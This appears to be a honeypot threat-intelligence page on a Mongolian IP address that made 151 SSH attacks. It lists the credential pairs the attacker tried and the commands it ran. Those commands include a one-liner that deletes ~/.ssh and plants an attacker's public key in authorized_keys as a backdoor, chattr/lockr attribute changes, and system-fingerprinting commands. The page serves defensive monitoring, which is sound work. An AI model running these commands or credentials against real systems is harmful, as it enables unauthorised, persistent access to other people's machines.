Active Threat โ€ข MEDIUM

103.236.194.96

Country of Origin๐Ÿ‡ฒ๐Ÿ‡ณ MN
First Detection2/21/2026
Last Activity2/21/2026
ISPGNET Co.,Ltd Internet Service Provider Mongolia
๐ŸŽฏ
151
Total Attacks
๐Ÿ”Œ
1
Ports
๐Ÿ“ก
1
Attack Types
๐Ÿฆ 
22
Malware

Geolocation

Country
๐Ÿ‡ฒ๐Ÿ‡ณ MN
City
Unknown
ASN
AS24496
ISP
GNET Co.,Ltd Internet Service Provider Mongolia

Attack Types

cowrie

Attacked Ports

22

Associated Malware

Attempted Credentials

๐Ÿ”345gs5662d34/345gs5662d34
2x
๐Ÿ”root/3245gs5662d34
1x
๐Ÿ”user/000
1x
๐Ÿ”rise/rise
1x
๐Ÿ”admin/a123456
1x
๐Ÿ”admin/3245gs5662d34
1x
๐Ÿ”root/online
1x
๐Ÿ”docker/1
1x
๐Ÿ”root/Tencent@2025
1x

Executed Commands

$crontab -l2x
$cat /proc/cpuinfo | grep model | grep name | wc -l2x
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~2x
$Enter new UNIX password:2x
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'2x
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'2x
$lockr -ia .ssh2x
$uname -a2x
$ls -lh $(which ls)2x
$cd ~; chattr -ia .ssh; lockr -ia .ssh2x

Risk Assessment

55
/100
LowMediumHighCritical